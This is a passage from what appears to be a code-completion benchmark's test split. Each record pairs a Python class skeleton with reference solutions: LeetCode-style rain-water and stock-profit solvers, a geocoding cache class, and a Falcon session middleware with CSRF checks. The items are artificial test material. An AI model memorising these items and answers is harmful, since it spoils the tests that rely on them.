[0]\nfor h in height:\n max_from_left.append(max(max_from_left[-1], h))\nfor h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\nmax_from_right.reverse()\nreturn sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))"], "bodies_text": "<|body_start_0|>\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n 
for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n<|end_body_3|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n <|body_0|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_1|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n <|body_2|>\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n 
max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000398", "length_bytes": 3861, "license_type": "no_license", "methods": [{"docstring": "08/06/2018 02:27", "name": "trap", "signature": "def trap(self, height)"}, {"docstring": "Time complexity: O(n) Space complexity: O(n)", "name": "trap", "signature": "def trap(self, height: List[int]) -> int"}, {"docstring": "Time complexity: O(n) Space complexity: O(1)", "name": "trap", "signature": "def trap(self, height: List[int]) -> int"}, {"docstring": "10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)", "name": "_trap", "signature": "def _trap(self, height: List[int]) -> int"}], "n_methods": 4, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def trap(self, height): 08/06/2018 02:27\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(n)\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(1)\n- def _trap(self, height: List[int]) -> int: 10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def trap(self, height): 08/06/2018 02:27\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(n)\n- def trap(self, height: List[int]) -> int: Time complexity: O(n) Space complexity: O(1)\n- def _trap(self, height: List[int]) -> int: 10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\n\n<|skeleton|>\nclass Solution:\n\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n <|body_0|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_1|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n <|body_2|>\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = 
height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n<|end_body_3|>\n", "revision_id": "1389a009a02e90e8700a7a00e0b7f797c129cdf4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n <|body_0|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_1|>\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n <|body_2|>\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def trap(self, height):\n \"\"\"08/06/2018 02:27\"\"\"\n if not height:\n return 0\n max_right = [height[-1]]\n rheight = reversed(height)\n next(rheight)\n for i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\n max_right.reverse()\n max_left = [height[0]]\n for i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\n s = 0\n for h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\n return s\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(n)\"\"\"\n height = [0] + height + [0]\n n = len(height)\n left_highest = [0]\n for i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\n right_highest = [0]\n for i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\n right_highest.reverse()\n ret = 0\n for h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\n return ret\n\n def trap(self, height: List[int]) -> int:\n \"\"\"Time complexity: O(n) Space complexity: O(1)\"\"\"\n if not height:\n return 0\n ret = 0\n highest_idx = 0\n highest = height[highest_idx]\n water = 0\n for i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n highest_idx_from_left = highest_idx\n highest_idx = len(height) - 1\n highest = height[highest_idx]\n water = 0\n for i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\n return ret\n\n def _trap(self, height: List[int]) -> int:\n \"\"\"10/16/2022 16:16 Time complexity: O(n) Space complexity: O(n)\"\"\"\n max_from_left = [0]\n max_from_right = [0]\n for h in height:\n max_from_left.append(max(max_from_left[-1], h))\n for h in reversed(height):\n max_from_right.append(max(max_from_right[-1], h))\n max_from_right.reverse()\n 
return sum((max(0, min(l, r) - height[i]) for i, (l, r) in enumerate(zip(max_from_left, max_from_right), -1)))\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode/solved/42_Trapping_Rain_Water/solution.py", "source_repo": "sungminoh/algorithms", "split": "test", "star_events_count": 0} {"blob_id": "1cf3a307aa971e6236aebd0d761ba139590fc651", "bodies": ["if city is None and state is None:\n return 'USA'\nelif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\nreturn f'{city}, {state} USA'", "loc_id = LocationCoordinates.to_location(city, state)\nrow = LocationCoordinates.query.get(loc_id)\nif row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\nreturn (row.latitude, row.longitude)"], "bodies_text": "<|body_start_0|>\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n<|end_body_0|>\n\n<|body_start_1|>\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n<|end_body_1|>\n", "class_docstring": "This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.", "class_name": "LocationCoordinates", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n <|body_0|>\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. 
If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n<|end_body_0|>\n\n<|body_start_1|>\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000399", "length_bytes": 39169, "license_type": "no_license", "methods": [{"docstring": "Converts a city and state (both optional) to the key expected by this table.", "name": "to_location", "signature": "def to_location(city: str=None, state: str=None) -> str"}, {"docstring": "Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')", "name": "get", "signature": "def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001548", "prompt": "Implement the Python class `LocationCoordinates` described below.\n\nClass description:\nThis table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\n\nMethod signatures and docstrings:\n- def to_location(city: str=None, state: str=None) -> str: Converts a city and state (both optional) to the key expected by this table.\n- def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]: Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')", "prompted_full_text": "Implement the Python class `LocationCoordinates` described below.\n\nClass description:\nThis table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\n\nMethod signatures and docstrings:\n- def to_location(city: str=None, state: str=None) -> str: Converts a city and state (both optional) to the key expected by this table.\n- def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]: Gets the coordinates for the given city and/or state. 
If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\n\n<|skeleton|>\nclass LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n <|body_0|>\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n<|end_body_0|>\n\n<|body_start_1|>\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n<|end_body_1|>\n", "revision_id": "344eec835b1468a828f83f6bc3f737c421777de5", "skeleton": "<|skeleton|>\nclass LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n <|body_0|>\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LocationCoordinates:\n \"\"\"This table contains a mapping between a location string to the coordinates of that location. It contains static functions to convert a given city/state to the expected format and to 'get' coordinates (which will attempt to first retrieve from the table, then query the geolocator if not present). 
Locations are in the format: `X, Y USA` where X is the city name and Y is the state's 2 letter abbreviation.\"\"\"\n\n def to_location(city: str=None, state: str=None) -> str:\n \"\"\"Converts a city and state (both optional) to the key expected by this table.\"\"\"\n if city is None and state is None:\n return 'USA'\n elif city is None or state is None:\n return f\"{city or ''}{state or ''}, USA\"\n return f'{city}, {state} USA'\n\n def get(city: str=None, state: str=None, fallback=True) -> Tuple[float, float]:\n \"\"\"Gets the coordinates for the given city and/or state. If fallback is true, it will attempt to get the closest matching result (just state if city cannot be found, otherwise just 'USA')\"\"\"\n loc_id = LocationCoordinates.to_location(city, state)\n row = LocationCoordinates.query.get(loc_id)\n if row is None:\n loc_obj = geolocator.geocode(loc_id)\n if loc_obj is None or loc_obj.latitude is None:\n if not fallback:\n raise ValueError(f\"Cannot be found: '{loc_id}' (city: {city}, state: {state})\")\n if state is not None:\n return LocationCoordinates.get(None, state, fallback)\n return (32.3078, -64.7505)\n row = LocationCoordinates(location=loc_id, latitude=loc_obj.latitude, longitude=loc_obj.longitude)\n db.session.add(row)\n db.session.commit()\n return (row.latitude, row.longitude)\n", "source": "the_stack_v2_python_sparse", "source_path": "app/models.py", "source_repo": "shirtandtieler/Job-Website-Project", "split": "test", "star_events_count": 2} {"blob_id": "61c1bfbecef7de0eba4d102724e086051661809f", "bodies": ["if len(prices) == 0:\n return 0\ns0 = -prices[0]\ns1 = -2 ** 31\nfor i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\nreturn max(0, s1)", "maxNum = 0\nlength = len(prices)\nfor i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\nreturn maxNum"], "bodies_text": "<|body_start_0|>\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n<|end_body_0|>\n\n<|body_start_1|>\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n<|end_body_0|>\n\n<|body_start_1|>\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000400", "length_bytes": 1603, "license_type": "no_license", "methods": [{"docstring": ":type prices: List[int] :rtype: int", "name": "maxProfit", "signature": "def maxProfit(self, prices)"}, {"docstring": ":type prices: List[int] :rtype: int", "name": "maxProfit", "signature": "def maxProfit(self, prices)"}], 
"n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005401", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int\n- def maxProfit(self, prices): :type prices: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n<|end_body_0|>\n\n<|body_start_1|>\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n<|end_body_1|>\n", "revision_id": "328408860fcf6bffbbd2096b4c7182d8abb2ea66", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n if len(prices) == 0:\n return 0\n s0 = -prices[0]\n s1 = -2 ** 31\n for i in range(1, len(prices)):\n s0 = max(s0, -prices[i])\n s1 = max(s1, prices[i] + s0)\n return max(0, s1)\n\n def maxProfit(self, prices):\n \"\"\":type prices: List[int] :rtype: int\"\"\"\n maxNum = 0\n length = len(prices)\n for i in range(length):\n for j in range(i + 1, length):\n profit = prices[j] - prices[i]\n if profit > maxNum:\n maxNum = profit\n return maxNum\n", "source": "the_stack_v2_python_sparse", "source_path": "lcode1-99/ex83/maxProfit.py", "source_repo": "rh01/gofiles", "split": "test", "star_events_count": 0} {"blob_id": "6469253f368155117f91d8c22133bac03f7296cf", "bodies": ["self.manager = SessionManager()\nself.config = dict()\nself.config['exempt_routes'] = exempt_routes\nself.config['exempt_methods'] = dict()\nself.config['exempt_methods']['global'] = exempt_methods\nroutes = self._get_all_routes(api)\nfor route in routes:\n self._get_settings(*route)", "routes = []\n\ndef get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\nfor node in api._router._roots:\n get_node_and_children(node)\nreturn routes", "local_conf = getattr(resource, 'auth', {})\nif local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\nself.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])", "if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % 
(req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')", "exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\ntry:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\nexcept BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\nself.csrf_protect(req)"], "bodies_text": "<|body_start_0|>\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n<|end_body_0|>\n\n<|body_start_1|>\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n<|end_body_1|>\n\n<|body_start_2|>\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n<|end_body_2|>\n\n<|body_start_3|>\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n<|end_body_3|>\n\n<|body_start_4|>\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "SessionMiddleware", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SessionMiddleware:\n\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n <|body_0|>\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n <|body_1|>\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. 
uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n <|body_2|>\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n <|body_3|>\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n<|end_body_0|>\n\n<|body_start_1|>\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n 